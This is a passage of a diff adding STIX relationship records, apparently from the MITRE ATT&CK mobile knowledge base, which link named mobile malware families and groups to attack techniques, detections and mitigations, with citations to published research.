"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--08f1a4b1-96c9-44c2-bc5b-5a779541213b", + "created": "2019-12-10T16:07:41.081Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. 
Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:47:53.438Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) replaces `/system/bin/ip` with a malicious version. [Dvmap](https://attack.mitre.org/software/S0420) can inject code by patching `libdmv.so` or `libandroid_runtime.so`, depending on the Android OS version. Both libraries are related to the Dalvik and ART runtime environments. The patched functions can only call `/system/bin/ip`, which was replaced with the malicious version.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4d4dfc26-3ab7-4798-abf2-be8dc278fdfa", + "type": "relationship", + "created": "2020-11-24T17:55:12.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." 
+ } + ], + "modified": "2020-11-24T17:55:12.804Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) has the capability to remotely load plugins and download and compile new .NET code.(Citation: Talos GPlayed) ", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0800f6bf-00c5-46d8-b876-1eeeb81b741f", + "created": "2023-03-20T15:55:32.395Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:55:32.395Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--c548d8c4-a0a3-4a24-bb79-2a84abbc7b36", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--53ebd5b6-e60e-4aa4-a342-de586917f06d", + "created": "2023-03-20T18:38:36.873Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:38:36.873Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3ca453a4-bd78-4087-a93f-9261fb2e3f00", + "type": "relationship", + "created": "2020-09-15T15:18:12.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-09-15T15:18:12.421Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect a list of installed applications.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1317fb3d-ded3-4b84-8007-147f3b02948a", + "created": "2022-04-05T19:52:38.539Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "CSRIC-WG1-FinalReport", + "description": "CSRIC-WG1-FinalReport" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Filtering requests by checking request origin information may provide some defense against spurious operators.(Citation: CSRIC-WG1-FinalReport) ", + "modified": "2022-04-05T19:52:38.539Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e829ee51-1caf-4665-ba15-7f8979634124", + "target_ref": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "x_mitre_attack_spec_version": "2.1.0", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--049b0c71-63e3-47ce-bb0b-149df0344b15", + "created": "2020-12-24T21:45:56.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:15:59.861Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can access device contacts.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a87fa426-3968-4d3b-8f8d-8e3c3a9c32f5", + "type": "relationship", + "created": "2019-09-03T20:08:00.764Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . 
Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "source_name": "Talos Gustuff Apr 2019" + } + ], + "modified": "2019-09-15T15:35:33.379Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) gathers information about the device, including the default SMS application, if SafetyNet is enabled, the battery level, the operating system version, and if the malware has elevated permissions.(Citation: Talos Gustuff Apr 2019)", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--90d58c65-acb9-4d7b-89b9-f4b35593c861", + "created": "2021-02-08T16:36:20.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. 
Retrieved February 8, 2021.", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:06:46.369Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included SMS message exfiltration in the malicious apps deployed as part of Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3997b2a1-2b70-4eeb-aa8f-1053bb3744c2", + "created": "2023-03-20T19:00:26.780Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T19:00:26.780Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e0ebf0cd-9244-4cef-9171-128a12b87b58", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). 
SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:32:29.636Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) can read SMS messages.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7af7d094-3a49-4e5e-99d0-385c79f95f06", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. 
Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) monitors the victim for status and disables other access to the phone by other jailbreaking software.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--04530307-22d8-4a06-9056-55eea225fabb", + "type": "relationship", + "created": "2019-07-10T15:35:43.710Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.842Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) retrieves messages and decryption keys for popular messaging applications and other accounts stored on the device.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cd0f76da-ea06-4710-ab1d-53a7e29a6328", + "created": "2022-03-30T19:34:09.377Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T19:34:09.377Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--8c7862ff-3449-4ac6-b0fd-ac1298a822a5", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d01b311d-8741-4b58-b127-88fecb2b0544", + "created": "2020-04-08T15:41:19.448Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Anubis](https://attack.mitre.org/software/S0422) has a keylogger that works in every application installed on the device.(Citation: Cofense Anubis)", + "modified": "2022-04-15T17:33:02.327Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d13724d0-a5e2-433b-86bf-ead04359edec", + "created": "2022-04-01T15:13:10.022Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "iOS Universal Links", + "url": "https://developer.apple.com/ios/universal-links/", + "description": "Apple. (n.d.). Universal Links for Developers. Retrieved September 11, 2020." + }, + { + "source_name": "Android App Links", + "url": "https://developer.android.com/training/app-links/verify-site-associations", + "description": "Google. (n.d.). Verify Android App Links. Retrieved September 11, 2020." + }, + { + "source_name": "IETF-PKCE", + "url": "https://tools.ietf.org/html/rfc7636", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Developers should use Android App Links(Citation: Android App Links) and iOS Universal Links(Citation: iOS Universal Links) to provide a secure binding between URIs and applications, preventing malicious applications from intercepting redirections. 
Additionally, for OAuth use cases, PKCE(Citation: IETF-PKCE) should be used to prevent use of stolen authorization codes. ", + "modified": "2022-04-01T15:13:10.022Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d170a088-b115-4a86-b093-8aa32666a470", + "created": "2023-03-15T16:39:55.148Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:39:55.148Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4e9f021d-3cf4-4790-8f7d-f87f33133446", + "created": "2020-12-14T14:52:03.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. 
Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:26:37.661Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can collect SMS messages.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a1814198-1f91-41d4-a413-d55e1a66c8e9", + "type": "relationship", + "created": "2020-07-20T13:27:33.548Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." 
+ } + ], + "modified": "2020-08-10T22:00:43.490Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) uses `dumpsys` to determine if certain applications are running.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6d659130-545b-4917-891c-6c1b7d54ed07", + "type": "relationship", + "created": "2021-01-05T20:16:20.505Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.505Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can send SMS messages.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--299931f0-4c60-4a9b-8a6a-4adb6362e590", + "created": "2019-09-23T13:36:08.543Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. 
Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:57:05.633Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can access and upload the contacts list to the command and control server.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4a408dee-07da-4855-b2ff-be512480ccb5", + "created": "2023-01-19T18:08:41.596Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. 
Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:18:05.095Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can gather device UDIDs.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ed3293cf-de4f-4a73-98af-24325e8187c9", + "created": "2020-04-24T17:46:31.598Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. 
Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:51:43.135Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can detect if it is running on a rooted device or an emulator.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--afc0f502-39bb-41e3-b4fc-5b5bb1a1175b", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "modified": "2019-10-10T15:27:22.110Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to record calls as well as the victim device's environment.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fbdbddd7-4980-4061-9192-24a887bc6bad", + "type": "relationship", + "created": "2020-12-07T14:28:32.141Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-12-07T14:28:32.141Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can open a SOCKS proxy connection through the compromised device.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a3c9d5d6-acc5-46e9-9e4f-b078aeac553c", + "created": "2020-12-14T14:52:03.385Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can fetch a backup C2 domain from Twitter if the primary C2 is unresponsive.(Citation: Sophos Red Alert 2.0)", + "modified": "2022-04-20T17:56:51.457Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d716163d-2492-4088-9235-b2310312ba27", + "created": "2022-04-06T15:44:48.422Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:44:48.422Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": 